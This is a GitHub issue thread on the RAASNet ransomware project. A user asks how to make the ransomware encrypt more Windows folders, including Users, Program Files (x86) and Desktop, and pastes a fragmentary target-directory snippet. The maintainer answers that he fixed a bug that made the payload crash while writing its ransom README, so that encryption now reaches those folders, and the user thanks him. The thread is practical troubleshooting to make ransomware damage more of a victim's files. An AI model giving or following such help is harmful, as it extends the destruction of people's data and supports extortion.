### ISSUE TITLE
About encryption

### ISSUE THREAD

**Issue by Nicolasaandreas** [leonv024/RAASNet#10]
I cannot encrypt some directories.

     # Get user home:
     return str ('C: \\') + '/'

  dirs = ['Downloads',
'Program Files',
'Users',
'Program Files (x86)',
'Desktop',
'Onedrive'
]

program files are encrypted, but users and Program Files (x86) are not.

**Comment by Nicolasaandreas** [comment]
or can I encrypt all C disk except windows directory?

When I do the above, the program encrypts the files directory, it cannot encrypt other directories, users or program files x86.

**Comment by Nicolasaandreas** [comment]
or can I encrypt C: \ disk as well as program files and desktop, my documents?

def get_target ():
     # Get user home:
     return str ('C: \\') + '/'

  dirs = ['Downloads',
'Program Files',
'Users',
'Program Files (x86)',
'Desktop',
'Onedrive'
]

In this way, only program files are encrypted. users, program files (86) or desktop, my documents are not encrypted.

**Comment by leonv024** [comment]
Hi,

Thank you for finding this issue.
I just finished testing, found the issue and applied a fix.

The payload exited on a permission error that occurred writing the README.txt.
It should work now :)

I tested with the following setting:
![fix](https://user-images.githubusercontent.com/33411715/77847308-86f1b800-71bc-11ea-97fd-2e7c306be1cc.png)

**Comment by Nicolasaandreas** [comment]
I thank you. you have done a successful job. :)
